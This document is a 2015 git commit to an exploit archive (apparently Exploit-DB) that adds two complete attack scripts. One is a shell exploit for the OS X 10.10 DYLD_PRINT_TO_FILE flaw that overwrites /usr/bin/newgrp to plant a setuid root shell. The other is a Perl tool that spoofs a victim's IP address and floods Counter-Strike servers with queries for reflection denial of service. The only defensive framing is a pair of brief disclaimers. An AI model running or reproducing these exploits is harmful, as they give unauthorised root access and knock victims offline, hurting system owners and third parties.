DB: 2015-07-23

2 new exploits
2015-07-23 05:01:51 +00:00 · 2015-07-23 05:01:51 +00:00 · 3b462fe869
commit 3b462fe869
parent 992137fd37
3 changed files with 283 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -33997,3 +33997,5 @@ id,file,description,date,author,platform,type,port
 37666,platforms/php/webapps/37666.txt,"Joomla! Helpdesk Pro Plugin < 1.4.0 - Multiple Vulnerabilities",2015-07-21,"Simon Rawet",php,webapps,80
 37667,platforms/java/remote/37667.rb,"SysAid Help Desk 'rdslogs' Arbitrary File Upload",2015-07-21,metasploit,java,remote,0
 37668,platforms/windows/remote/37668.php,"Internet Download Manager - OLE Automation Array Remote Code Execution",2015-07-21,"Reza Espargham",windows,remote,0
+37669,platforms/windows/dos/37669.pl,"Counter-Strike 1.6 'GameInfo' Query Reflection DoS PoC",2015-07-22,"Todor Donev",windows,dos,0
+37670,platforms/osx/local/37670.sh,"OS X 10.10 DYLD_PRINT_TO_FILE Local Privilege Escalation",2015-07-22,"Stefan Esser",osx,local,0
--- a/platforms/osx/local/37670.sh
+++ b/platforms/osx/local/37670.sh
@ -0,0 +1,110 @@
+#!/bin/sh
+#
+# Simple Proof of Concept Exploit for the DYLD_PRINT_TO_FILE
+# local privilege escalation vulnerability in OS X 10.10 - 10.10.4
+#
+# (C) Copyright 2015 Stefan Esser <stefan.esser@sektioneins.de>
+#
+# Wait months for a fix from Apple or install the following KEXT as protection
+# https://github.com/sektioneins/SUIDGuard
+#
+# Use at your own risk. This copies files around with root permissions,
+# overwrites them and deletes them afterwards. Any glitch could corrupt your
+# system. So you have been warned.
+
+SUIDVICTIM=/usr/bin/newgrp
+
+# why even try to prevent a race condition?
+TARGET=`pwd`/tmpXXXXX
+
+rm -rf $TARGET
+mkdir $TARGET
+
+cat << EOF > $TARGET/boomsh.c
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+int main()
+{
+        setuid(0);
+        setgid(0);
+        system("/bin/bash -i");
+        printf("done.\n");
+        return 0;
+}
+EOF
+cat << EOF > $TARGET/overwrite.c
+#include <sys/types.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <stdlib.h>
+#include <stdio.h>
+
+int main(int argc, char **argv)
+{
+        int fd;
+        char buffer[1024];
+        ssize_t toread, numread;
+        ssize_t numwritten;
+        ssize_t size;
+
+        /* disable O_APPEND */
+        fcntl(3, F_SETFL, 0);
+        lseek(3, 0, SEEK_SET);
+
+        /* write file into it */
+        fd = open(
+EOF
+echo "\"$TARGET/boomsh\"" >> $TARGET/overwrite.c
+cat << EOF >> $TARGET/overwrite.c
+        , O_RDONLY, 0);
+        if (fd > 0) {
+
+                /* determine size */
+                size = lseek(fd, 0, SEEK_END);
+                lseek(fd, 0, SEEK_SET);
+
+                while (size > 0) {
+                        if (size > sizeof(buffer)) {
+                                toread = sizeof(buffer);
+                        } else {
+                                toread = size;
+                        }
+
+                        numread = read(fd, &buffer, toread);
+                        if (numread < toread) {
+                                fprintf(stderr, "problem reading\n");
+                                _exit(2);
+                        }
+                        numwritten = write(3, &buffer, numread);
+                        if (numread != numwritten) {
+                                fprintf(stderr, "problem writing\n");
+                                _exit(2);
+                        }
+
+                        size -= numwritten;
+
+                }
+
+                fsync(3);
+                close(fd);
+        } else {
+                fprintf(stderr, "Cannot open for reading\n");
+        }
+
+        return 0;
+}
+EOF
+
+cp $SUIDVICTIM $TARGET/backup
+gcc -o $TARGET/overwrite $TARGET/overwrite.c
+gcc -o $TARGET/boomsh $TARGET/boomsh.c
+
+EDITOR=$TARGET/overwrite DYLD_PRINT_TO_FILE=$SUIDVICTIM crontab -e 2> /dev/null
+echo "cp $TARGET/boomsh /usr/bin/boomsh; chmod 04755 /usr/bin/boomsh " | $SUIDVICTIM > /dev/null 2> /dev/null
+echo "cp $TARGET/backup $SUIDVICTIM" | /usr/bin/boomsh > /dev/null 2> /dev/null
+
+rm -rf $TARGET
+
+/usr/bin/boomsh
--- a/platforms/windows/dos/37669.pl
+++ b/platforms/windows/dos/37669.pl
@ -0,0 +1,171 @@
+#!/usr/bin/perl
+#
+#  Counter-Strike 1.6 'GameInfo' Query Reflection DoS
+#  Proof Of Concept
+#
+#  Copyright 2015 (c) Todor Donev 
+#  todor.donev@gmail.com
+#  http://www.ethical-hacker.org/
+#  https://www.facebook.com/ethicalhackerorg
+#  http://pastebin.com/u/hackerscommunity 
+#
+#
+#  Disclaimer:
+#  This or previous program is for Educational
+#  purpose ONLY. Do not use it without permission.
+#  The usual disclaimer applies, especially the
+#  fact that Todor Donev is not liable for any
+#  damages caused by direct or indirect use of the
+#  information or functionality provided by these
+#  programs. The author or any Internet provider
+#  bears NO responsibility for content or misuse
+#  of these programs or any derivatives thereof.
+#  By using these programs you accept the fact
+#  that any damage (dataloss, system crash,
+#  system compromise, etc.) caused by the use
+#  of these programs is not Todor Donev's
+#  responsibility.
+#
+#  Use at your own risk and educational 
+#  purpose ONLY!
+#
+#  See also, UDP-based Amplification Attacks:
+#  https://www.us-cert.gov/ncas/alerts/TA14-017A
+#
+#  # perl cstrike-drdos-poc.pl 46.165.194.16 192.168.1.10 27010
+#  [ Counter-Strike 1.6 'GameInfo' query reflection dos poc
+#  [ Sending GameInfo requests: 46.165.194.16 -> 192.168.1.10  
+#  ^C
+#
+#  # tcpdump -i eth0 -c4 port 27010
+#  tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
+#  listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
+#  00:00:00.000000 IP 192.168.1.10.31337 > masterserver.css.setti.info.27010: UDP, length 25
+#  00:00:00.000000 IP masterserver.css.setti.info.27010 > 192.168.1.10.31337: UDP, length 1392
+#  00:00:00.000000 IP 192.168.1.10.31337 > masterserver.css.setti.info.27010: UDP, length 25
+#  00:00:00.000000 IP masterserver.css.setti.info.27010 > 192.168.1.10.31337: UDP, length 1392
+#  4 packets captured
+#  4 packets received by filter
+#  0 packets dropped by kernel
+
+
+use strict;
+use Socket;
+use warnings;
+no warnings 'uninitialized';
+
+print "[ Counter-Strike 1.6 \'GameInfo\' query reflection dos poc\n";
+die "[ Sorry, must be run as root. This script use RAW Socket.\n" if ($< != 0);
+my $css         = (gethostbyname($ARGV[0]))[4];         # IP Address Destination        (32 bits)
+my $victim      = (gethostbyname($ARGV[1]))[4];         # IP Address Source             (32 bits)
+my $port        = $ARGV[2] || '27015';                  # Int between 1 and 65535        Default: 27015
+die "[ Port must be between 1 and 65535!\n" if ($port < 1 || $port > 65535);
+if (!defined $css || !defined $victim) {
+    print "[ Usg: $0 <cstrike server> <victim> <port>\n";
+    print "[ Default port: 27015\n";
+    print "[ <todor.donev\@gmail.com> Todor Donev\n";
+    exit;
+}
+
+print "[ Sending GameInfo requests: $ARGV[0] -> $ARGV[1]\n";
+socket(RAW, AF_INET, SOCK_RAW, 255)             || die $!;
+setsockopt(RAW, 0, 1, 1)                        || die $!;
+main();
+
+    # Main program
+sub main {
+    my $packet;
+    
+    $packet = iphdr();
+    $packet .= udphdr();
+    $packet .= cshdr();
+    # b000000m...
+    send_packet($packet);
+}
+
+    # IP header (Layer 3)
+sub iphdr {
+    my $ip_ver         	= 4;                                    # IP Version 4                  (4 bits)
+    my $iphdr_len      	= 5;                                    # IP Header Length              (4 bits)
+    my $ip_tos         	= 0;                                    # Differentiated Services       (8 bits)
+    my $ip_total_len   	= $iphdr_len + 20;                      # IP Header Length + Data      (16 bits)
+    my $ip_frag_id     	= 0;                                    # Identification Field         (16 bits)
+    my $ip_frag_flag   	= 000;                                  # IP Frag Flags (R DF MF)       (3 bits)
+    my $ip_frag_offset 	= 0000000000000;                        # IP Fragment Offset           (13 bits)
+    my $ip_ttl         	= 255;                                  # IP TTL                        (8 bits)
+    my $ip_proto       	= 17;                                   # IP Protocol                   (8 bits)
+    my $ip_checksum    	= 0;                                    # IP Checksum                  (16 bits)
+
+    # IP Packet
+	my $iphdr       = pack(
+                        'H2 H2 n n B16 h2 c n a4 a4',
+                        $ip_ver . $iphdr_len, $ip_tos, 
+                        $ip_total_len, $ip_frag_id, 
+                        $ip_frag_flag . $ip_frag_offset,
+                        $ip_ttl, $ip_proto, $ip_checksum,
+                        $victim, $css
+                        );
+                        return $iphdr;
+}
+
+    # UDP Header (Layer 4)
+sub udphdr {
+    my $udp_src_port	= 31337;                        # UDP Sort Port         (16 bits) (0-65535)
+    my $udp_dst_port	= $port;                        # UDP Dest Port         (16 btis) (0-65535)
+    my $udp_len		= 8 + length(cshdr());          # UDP Length            (16 bits) (0-65535)
+    my $udp_checksum 	= 0;                            # UDP Checksum          (16 bits) (XOR of header)
+
+    # UDP Packet
+    my $udphdr		= pack(
+			'n n n n',
+			$udp_src_port, 
+			$udp_dst_port,
+			$udp_len, 
+			$udp_checksum
+			);
+	return $udphdr;
+}
+
+   # Counter-Strike 'GameInfo' request 
+sub cshdr {
+
+#
+# https://developer.valvesoftware.com/wiki/Server_queries
+#
+# https://developer.valvesoftware.com/wiki/Source_RCON_Protocol
+# Requests
+# The server responds to 5 queries:
+#
+#          A2S_INFO   'T' (0x54) 
+#    Basic information about the server. 
+#          A2S_PLAYER 'U' (0x55)  
+#    Details about each player on the server. 
+#          A2S_RULES  'V' (0x56) 
+#    The rules the server is using. 
+#          A2A_PING   'i' (0x69)
+#    Ping the server. (DEPRECATED) 
+# A2S_SERVERQUERY_GETCHALLENGE  'W' (0x57)
+#    Returns a challenge number for use in the player and rules query. (DEPRECATED) 
+#
+# Queries should be sent in UDP packets to the listen port of the server. 
+#
+ 
+# 25 bytes - A2S_INFO
+    my $query            = "\xff\xff\xff\xff\x54";      # 0000   ff ff ff ff 54 53 6f 75 72 63 65 20 45 6e 67 69  ....TSource Engi
+       $query           .= "\x53\x6f\x75\x72\x63";      # 0010   6e 65 20 51 75 65 72 79 00                       ne Query.
+       $query           .= "\x65\x20\x45\x6e\x67";	
+       $query           .= "\x69\x6e\x65\x20\x51";	
+       $query           .= "\x75\x65\x72\x79\x00";	
+
+    my $cshdr            = pack('a*', $query);
+return $cshdr;
+}
+
+sub send_packet {
+    while(1){
+    select(undef, undef, undef, 0.40);                  # Sleep 400 milliseconds
+    send(RAW, $_[0], 0, pack('Sna4x8', AF_INET, 60, $css))  || die $!;
+   }
+}
+
+